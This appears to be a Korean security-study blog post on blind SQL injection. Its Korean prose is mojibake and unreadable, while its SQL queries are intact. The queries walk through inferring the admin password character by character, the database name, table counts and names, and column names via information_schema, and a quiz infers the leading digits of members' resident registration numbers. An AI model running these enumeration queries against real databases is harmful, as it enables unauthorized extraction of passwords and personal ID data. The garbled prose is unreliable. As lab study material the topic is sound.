์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

Blind Injection -1

  • -
๋ฐ˜์‘ํ˜•
Blind Injection

content Based

Response Based

์ˆœ์ฐจ ํƒ์ƒ‰

์ด์ง„ ํƒ์ƒ‰

Bit ์—ฐ์‚ฐ ํƒ์ƒ‰

a๊ฐ€ ํฌํ•จ๋ผ์žˆ์ง€์•Š์•„์„œ FALSE = 0

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='a';

@๊ฐ€ ํฌํ•จ๋ผ์žˆ์–ด์„œ TRUE = 1

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='@';

Blind Injection ๊ณต๊ฒฉ์˜ ํ•ต์‹ฌ์€ ์ฐธ/๊ฑฐ์ง“์„ ํŒ๋ณ„ํ•˜์—ฌ ์‘๋‹ต๊ฐ’์„ ๋ฐ›๋Š” ๊ฒƒ

๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋งคํ•‘

 

< ์ˆœ์ฐจ ์ ‘๊ทผ >

DB์ด๋ฆ„ ๋ชฉ๋กํ™”

Table ์ด๋ฆ„ ๋ชฉ๋กํ™”

Column ์ด๋ฆ„์˜ ๋ชฉ๋กํ™”

 

< ๋น„์ˆœ์ฐจ ์ ‘๊ทผ >

๊ฐœ๋ฐœ์ž ์ž…์žฅ์—์„œ ๋ชฉ๋ก๋“ค์„ ์œ ์ถ”ํ•ด์•ผํ•œ๋‹ค

SELECT table_name FROM information_schema.tables WHERE schema_name='board' and table_name like '%mem%'

DATABASE ์ด๋ฆ„์ด board ์ด๋ฉด์„œ ํ…Œ์ด๋ธ” ์ด๋ฆ„์—์„œ %mem%์ธ๊ฒƒ

SELECT column_name FROM information_schema.columns WHERE table_schema='board' and table_name='members' and column_name like '%id%';

ํ…Œ์ด๋ธ” ์ด๋ฆ„ member์—์„œ id๊ฐ€ ๋“ค์–ด๊ฐ„ ์ปฌ๋Ÿผ

 


๋ธ”๋ผ์ธ๋“œ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”

1. ๊ธฐ๋ณธ์ •๋ณด ๋ชฉ๋กํ™”๋ฅผ ํ†ตํ•ด์„œ ๋ฐ˜๋“œ์‹œ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ์•Œ์•„๋‚ธ๋‹ค.

1-1. ๊ธ€์ž ์ˆ˜๋ฅผ ์œ ์ถ”ํ•œ๋‹ค : length()ํ•จ์ˆ˜// ๊ฒฐ๊ณผ๋ฌผ 5๊ธ€์ž

SELECT length((SELECT database()))=1;

๊ธ€์ž์ˆ˜๊ฐ€ 5๊ธ€์ž์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

1-2. 

SELECT substr((SELECT database()),1,1)='a';

๊ธ€์ž ๋งจ ์•ž๊ธ€์ž๊ฐ€ b์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ
๋‘๋ฒˆ์งธ ๊ธ€์ž๊ฐ€ o์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

1-2. ํ•œ๊ธ€์ž์”ฉ ๋น„๊ตํ•˜์—ฌ 0(๊ฑฐ์ง“)์ด ์•„๋‹Œ 1(์ฐธ)์˜ ๊ฐ’์„ ์ฐพ๋Š”๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ mid(),substr() // ๊ฒฐ๊ณผ๋ฌผ board

 

2. ์•Œ์•„๋‚ธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ๊ฐ€์ง€๊ณ  ํ…Œ์ด๋ธ” ์ด๋ฆ„์„ ์œ ์ถ”ํ•œ๋‹ค.

2-1. ํ…Œ์ด๋ธ”์˜ ๊ฐœ์ˆ˜๋ฅผ ํŒŒ์•…ํ•œ๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ count(*) // ๊ฒฐ๊ณผ 2๊ฐœ

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board')=1;

BOARD์˜ ํ…Œ์ด๋ธ” ๊ฐœ์ˆ˜๊ฐ€ 2๊ฐœ์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

 

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%')=1;

mem์ด๋ผ๋Š” ๋‹จ์–ด๊ฐ€ ๋“ค์–ด๊ฐ„ ํ…Œ์ด๋ธ” ์ด๋ฆ„์€ 1๊ฐœ ์ธ๊ฒƒ์„ ์œ ์ถ”๊ฐ€๋Šฅ

2-2. ๊ธ€์ž์ˆ˜๋ฅผ ์œ ์ถ”ํ•œ๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ length() // ๊ฒฐ๊ณผ 7๊ธ€์ž

SELECT length((SELECT table_name FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%'))=1;

7๊ธ€์ž์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

2-3. ํšŒ์› ํ…Œ์ด๋ธ”์„ ์œ ์ถ”ํ•˜์—ฌ '%mem%'์„ ์‚ฌ์šฉ : 

QUIZ ) ํšŒ์›๋“ค์˜ ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์•ž์˜ ๋‘์ž๋ฆฌ๋ฅผ ์œ ์ถ”ํ•ด๋ผ

์ฒซ๋ฒˆ์งธ ์ž๋ฆฌ 8์ธ๊ฒƒ ํ™•์ธ
๋‘๋ฒˆ์งธ ์ž๋ฆฌ 1์ธ๊ฒƒ ํ™•์ธ : admin : 81
์ฒซ๋ฒˆ์งธ ์ž๋ฆฌ 8์ธ๊ฒƒ ํ™•์ธ
๋‘๋ฒˆ์งธ ์ž๋ฆฌ 6์ธ๊ฒƒ ํ™•์ธ : gugucon : 86

SELECT password FROM members WHERE id='admin'
โ‘  SELECT (์ปฌ๋Ÿผ) โ‘ก FROM (ํ…Œ์ด๋ธ”) โ‘ข WHERE (์กฐ๊ฑด)
์‹คํ–‰ ์ˆœ์„œ : โ‘ก > โ‘ข > โ‘ 

 

3. ์œ ์ถ”ํ•œ ํ…Œ์ด๋ธ” ์ด๋ฆ„์„ ๊ฐ€์ง€๊ณ  ์ฐพ๊ณ ์‹ถ์€ ์ปฌ๋Ÿผ๋งŒ ์œ ์ถ”ํ•ด์„œ ์ฐพ์•„๋‚ธ๋‹ค.

 

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

ORACLE INJECTION  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
UNION SQL INJECTION  (0) 2022.06.30
SQL Injection  (0) 2022.06.29
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.